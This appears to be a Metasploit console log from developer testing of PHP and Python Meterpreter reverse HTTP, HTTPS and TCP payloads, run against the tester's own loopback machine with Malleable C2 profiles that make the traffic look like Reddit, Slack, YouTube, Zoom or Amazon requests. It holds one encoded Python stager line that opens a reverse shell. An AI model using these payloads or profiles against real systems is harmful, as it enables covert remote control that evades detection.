[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
msf payload(php/meterpreter_reverse_https) > [*] Started HTTPS reverse handler on https://127.0.0.1:4242

msf payload(php/meterpreter_reverse_https) > 
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: nq5af6l3) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: nq5af6l3) Redirecting stageless: URI '/oscp/h0aM10Qbj2WwM6M82gOxkwj9QrIlr6YuWoiUjmvCGKpi2jlFEYS1VrWPAh2IURgKzNfz74Qr19aOCbOJTijJF' with UA 'Microsoft-CryptoAPI/6.1' -> UUID h0aM10Qbj2WwM6M82gOx_AvE9EnFOg-m4m_tc7Vo9DQoEoBtejBNjQDZBpN36KtFfYAco364PYUBibQMQDBBZE9VlFEq4bcH_XTE4_Znd6Llbs6HEI4wgq1zMX
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: nq5af6l3) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: nq5af6l3) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: nq5af6l3) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:43400) at 2026-06-15 15:44:48 +0200

msf payload(php/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

reddit.profile

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/reddit.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/reddit.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 60600 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0
msf payload(php/meterpreter_reverse_https) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTPS reverse handler on https://127.0.0.1:4242
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 7wm629bl) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 7wm629bl) Redirecting stageless: URI '/r/webdev/comments/95ltyr' with UA 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36' -> UUID 5350RMs60dCp9rr5w8aqOQgVvIWEL5xvwe2NUG1ovjKvqia9ORujls
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 7wm629bl) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 7wm629bl) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 7wm629bl) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:54168) at 2026-06-15 15:53:20 +0200

msf payload(php/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

rtmp.profile

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/rtmp.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/rtmp.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 60108 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0
msf payload(php/meterpreter_reverse_https) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTPS reverse handler on https://127.0.0.1:4242
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: eqdjw2bc) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: eqdjw2bc) Redirecting stageless: URI '/idle/1376547834/1' with UA 'Shockwave Flash' -> UUID pr_i6qZMFlvpufq2g4ntkA2jB3a0eZjY1IAm4NgIeCtgsiKS8x
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: eqdjw2bc) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: eqdjw2bc) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: eqdjw2bc) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:43630) at 2026-06-15 15:54:49 +0200

msf payload(php/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
getuComputer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

slack

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/slack.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/slack.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 60432 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0
msf payload(php/meterpreter_reverse_https) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTPS reverse handler on https://127.0.0.1:4242
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 08olu5g3) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 08olu5g3) Redirecting stageless: URI '/messages/C0527B0NM' with UA 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)' -> UUID Gvzaa3j7bHPJwNrPo_DNfQfgqqfxwIughkY7eMZsaucteR4xMba2jPVYBI6IKvvPladUdtLvPbCdLN4XwGV4yyHkj06
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 08olu5g3) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 08olu5g3) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 08olu5g3) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:57318) at 2026-06-15 15:57:18 +0200

msf payload(php/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

stackoverflow

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/stackoverflow.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/stackoverflow.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 60516 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
msf payload(php/meterpreter_reverse_https) > [*] Started HTTPS reverse handler on https://127.0.0.1:4242
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: qsw8iyeg) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: qsw8iyeg) Redirecting stageless: URI '/questions/32251816/c-sharp-directives-compilation-error' with UA 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36' -> UUID 7XRv8mJ0u8x5IGovExB8igbW1IrQ58cgaOGb2VPkb-DbvTdoe0O8rpVITLK3BCvarpgJaRk0UaMKkr2sPk2NGKHh4EI-70RIA_XJJJw5FxCV1QUNdn7zUo
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: qsw8iyeg) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: qsw8iyeg) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: qsw8iyeg) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:38124) at 2026-06-15 16:01:15 +0200

msf payload(php/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

trevor.profile

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/trevor.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/trevor.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 60456 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0
msf payload(php/meterpreter_reverse_https) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started HTTPS reverse handler on https://127.0.0.1:4242
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: b6vln75m) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: b6vln75m) Redirecting stageless: URI '/us/ky/louisville/312-s-fourth-st.html' with UA 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)' -> UUID Ehn3hWSceaC4nauS0q29eA92RemBH
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: b6vln75m) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: b6vln75m) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: b6vln75m) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:37884) at 2026-06-15 16:02:14 +0200

msf payload(php/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

youtube.profile

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/youtube_video.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/youtube_video.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 60424 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
msf payload(php/meterpreter_reverse_https) > [*] Started HTTPS reverse handler on https://127.0.0.1:4242
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 2pxidvmn) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 2pxidvmn) Redirecting stageless: URI '/watch' with UA 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)' -> UUID RT1t83x_P6z91u7Zl-b7lwQqUCI4UQL8EtYeFgEsMfufhof18co58GwjA0g
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 2pxidvmn) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 2pxidvmn) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 2pxidvmn) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:34752) at 2026-06-15 16:03:45 +0200

msf payload(php/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

zoom.profile

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter_reverse_https
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/zoom.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/zoom.profile
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Writing 60508 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] Payload Handler Started as Job 0

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
msf payload(php/meterpreter_reverse_https) > [*] Started HTTPS reverse handler on https://127.0.0.1:4242

msf payload(php/meterpreter_reverse_https) > 
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: c1pntd9x) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: c1pntd9x) Redirecting stageless: URI '/s/58462514417 /wc/58462514417' with UA 'Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/16C104' -> UUID edh8z74Ox4owsyO8WoM3pgMxtVxi0N-7tHbG91flz3m5EJYJ0Ovswo6QbbySUWGD_W2XPOYX3Zft79YR1S-s0O-pDPSoSic76PZZGxVIY-mAcvkdoSj1jVUCZ-70Q-
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: c1pntd9x) Without a database connected that payload UUID tracking will not work!
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: c1pntd9x) Attaching orphaned/stageless session...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: c1pntd9x) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:58230) at 2026-06-15 16:07:18 +0200

msf payload(php/meterpreter_reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

staged

resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> use payload/php/meterpreter/reverse_https
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> generate -f raw -o /tmp/msf.php
[*] Writing 689 bytes to /tmp/msf.php...
resource (/home/ms/Desktop/msf_scripts/php_malleable_c2.rb)> to_handler

[*] Payload Handler Started as Job 0

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
msf payload(php/meterpreter/reverse_https) > 
msf payload(php/meterpreter/reverse_https) > 
[*] Started HTTPS reverse handler on https://127.0.0.1:4242
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: g3lhpazr) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.php is being used
[*] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: g3lhpazr) Staging php payload (67382 bytes) ...
[!] https://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: g3lhpazr) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.php is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:50828) at 2026-06-15 16:08:57 +0200

msf payload(php/meterpreter/reverse_https) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux cachyos-x8664 7.0.12-1-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 13 Jun 2026 11:49:00 +0000 x86_64
Architecture    : x64
System Language : en_US.UTF-8
Meterpreter     : php/linux
meterpreter > getuid
Server username: ms

msutovsky-r7 · 2026-06-16T05:40:37Z

Python

TCP

Stagged

msf payload(python/meterpreter/reverse_tcp) > set lport 4242
lport => 4242
msf payload(python/meterpreter/reverse_tcp) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf payload(python/meterpreter/reverse_tcp) > set lport 4242
lport => 4242
msf payload(python/meterpreter/reverse_tcp) > generate -f raw
exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNo9T01LxDAQPTe/IrckGENb4gqLFUQ8iIjgeltE2mTU0DQpSVar4n+3IYsMzPDmvfl4Zpp9SDh6NULi39YMfOgjbCSPKRxU4slMgF59wAs2DofevQFtarZFVQpfa65iV4ZFKbTlR7x7uL572T093lzds6wTyjsHKlFKmvZc1Gs0hMtWtizzQ4B+RBUsCuaUF+fLIlqAmZ4xZLvykDi4uVcjJZe3hEcRQH1Qydi+fka6O2LL0Oe7sYAtOKrZhV3X6ZN/9rS0GYIFFM2ehQblpzlAjLTYF8NG5qaGrOQ/JJJt/GXoD+MWXlU=')[0])))
msf payload(python/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0
msf payload(python/meterpreter/reverse_tcp) > 
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4242 
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Sending stage (29788 bytes) to 127.0.0.1
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:47246) at 2026-06-12 10:34:12 +0200

msf payload(python/meterpreter/reverse_tcp) > sysinfo
[-] Unknown command: sysinfo. Run the help command for more details.
msf payload(python/meterpreter/reverse_tcp) > sessions -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

Stageless

msf payload(python/meterpreter_reverse_tcp) > to_handler 
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4242 
msf payload(python/meterpreter_reverse_tcp) > WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 2 opened (127.0.0.1:4242 -> 127.0.0.1:45168) at 2026-06-12 10:37:49 +0200

msf payload(python/meterpreter_reverse_tcp) > sessions -1
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: ms

HTTP

stageless

amazon.profile

resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> use payload/python/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/amazon.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/amazon.profile
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> generate -f raw -o /tmp/msf.py
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Writing 30752 bytes to /tmp/msf.py...
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
msf payload(python/meterpreter_reverse_http) > [*] Started HTTP reverse handler on http://127.0.0.1:4242
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: p9lyceq2) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: p9lyceq2) Redirecting stageless: URI '/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books' with UA 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko' -> UUID xX16Y7l776vjUvZGiXkkWAgZxdvPy67wG8wZ
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: p9lyceq2) Without a database connected that payload UUID tracking will not work!
[*] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: p9lyceq2) Attaching orphaned/stageless session...
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: p9lyceq2) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Meterpreter session 1 opened (127.0.0.1:4242 -> 127.0.0.1:43784) at 2026-06-12 10:45:00 +0200

msf payload(python/meterpreter_reverse_http) > sessions -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: ms
meterpreter > sysinfo
Computer        : cachyos-x8664
OS              : Linux 7.0.11-1-cachyos #1 SMP PREEMPT_DYNAMIC Wed, 03 Jun 2026 22:05:15 +0000
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux

bing_maps

resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> use payload/python/meterpreter_reverse_http
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lhost 127.0.0.1
lhost => 127.0.0.1
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set lport 4242
lport => 4242
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> set malleablec2 /home/ms/Documents/Malleable-C2-Profiles/Normal/bing_maps.profile
malleablec2 => /home/ms/Documents/Malleable-C2-Profiles/Normal/bing_maps.profile
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> generate -f raw -o /tmp/msf.py
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Writing 30660 bytes to /tmp/msf.py...
resource (/home/ms/Desktop/msf_scripts/python_http_stageless_malleable_c2.rb)> to_handler
WARNING: Local file /home/ms/.msf4/payloads/meterpreter/meterpreter.py is being used
[*] Payload Handler Started as Job 0

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
msf payload(python/meterpreter_reverse_http) > [*] Started HTTP reverse handler on http://127.0.0.1:4242
[!] http://127.0.0.1:4242 handling request from 127.0.0.1; (UUID: 4le0m8k9) Without a database connected that payload UUID tracking will not work!
